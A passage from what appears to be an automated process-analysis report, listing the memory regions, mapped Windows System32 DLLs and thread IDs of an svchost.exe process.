pagefile_backed name = "pagefile_0x00007ff7877d0000" filename = "" Region: id = 1903 start_va = 0x7ff7878d0000 end_va = 0x7ff7878f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7878d0000" filename = "" Region: id = 1904 start_va = 0x7ff7878f3000 end_va = 0x7ff7878f4fff entry_point = 0x0 region_type = private name = "private_0x00007ff7878f3000" filename = "" Region: id = 1905 start_va = 0x7ff7878fb000 end_va = 0x7ff7878fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7878fb000" filename = "" Region: id = 1906 start_va = 0x7ff7878fe000 end_va = 0x7ff7878fffff entry_point = 0x0 region_type = private name = "private_0x00007ff7878fe000" filename = "" Region: id = 1907 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1908 start_va = 0x7ffaeafb0000 end_va = 0x7ffaeafcdfff entry_point = 0x7ffaeafb0000 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 1909 start_va = 0x7ffaeafd0000 end_va = 0x7ffaeafdcfff entry_point = 0x7ffaeafd0000 region_type = mapped_file name = "bthtelemetry.dll" filename = "\\Windows\\System32\\BthTelemetry.dll" (normalized: "c:\\windows\\system32\\bthtelemetry.dll") Region: id = 1910 start_va = 0x7ffaeafe0000 end_va = 0x7ffaeaff7fff entry_point = 0x7ffaeafe0000 region_type = mapped_file name = "bthradiomedia.dll" filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll") Region: id = 1911 start_va = 0x7ffaeb500000 end_va = 0x7ffaeb513fff entry_point = 0x7ffaeb500000 region_type = mapped_file name = "wlanradiomanager.dll" filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll") Region: id = 1912 start_va = 0x7ffaeb520000 end_va = 0x7ffaeb52dfff entry_point = 0x7ffaeb520000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1913 start_va = 0x7ffaeb570000 end_va = 0x7ffaeb5fcfff entry_point = 0x7ffaeb570000 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 1914 start_va = 0x7ffaeb640000 end_va = 0x7ffaeb657fff entry_point = 0x7ffaeb640000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 1915 start_va = 0x7ffaeb690000 end_va = 0x7ffaeb6eefff entry_point = 0x7ffaeb690000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1916 start_va = 0x7ffaec410000 end_va = 0x7ffaec419fff entry_point = 0x7ffaec410000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1917 start_va = 0x7ffaecef0000 end_va = 0x7ffaecf0cfff entry_point = 0x7ffaecef0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 1918 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1919 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1920 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1921 start_va = 0x7ffaf0ab0000 end_va = 0x7ffaf0abbfff entry_point = 0x7ffaf0ab0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 1922 start_va = 0x7ffaf0c00000 end_va = 0x7ffaf0c28fff entry_point = 0x7ffaf0c00000 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 1923 start_va = 0x7ffaf0c30000 end_va = 0x7ffaf0dd3fff entry_point = 0x7ffaf0c30000 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 1924 start_va = 0x7ffaf1590000 end_va = 0x7ffaf1609fff entry_point = 0x7ffaf1590000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1925 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1926 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1927 start_va = 0x7ffaf1b70000 end_va = 0x7ffaf1b87fff entry_point = 0x7ffaf1b70000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1928 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1929 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1930 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1931 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1932 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1933 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1934 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1935 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1936 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1937 start_va = 0x7ffaf4300000 end_va = 0x7ffaf4397fff entry_point = 0x7ffaf4300000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1938 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1939 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1940 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1941 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1942 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1943 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1944 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1945 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1946 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1947 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1948 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1949 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1950 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1951 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1952 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1953 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1954 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1955 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1956 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 197 os_tid = 0x420 Thread: id = 198 os_tid = 0x748 Thread: id = 199 os_tid = 0x72c Thread: id = 200 os_tid = 0x70c Thread: id = 201 os_tid = 0x6f8 Thread: id = 202 os_tid = 0x6f4 Thread: id = 203 os_tid = 0x6f0 Thread: id = 204 os_tid = 0x6dc Thread: id = 205 os_tid = 0x6a4 Thread: id = 206 os_tid = 0x598 Thread: id = 207 os_tid = 0x594 Thread: id = 208 os_tid = 0x134 Thread: id = 209 os_tid = 0x234 Thread: id = 210 os_tid = 0x12c Thread: id = 211 os_tid = 0x3f4 Thread: id = 212 os_tid = 0x3a8 Thread: id = 214 os_tid = 0x52c Thread: id = 215 os_tid = 0x364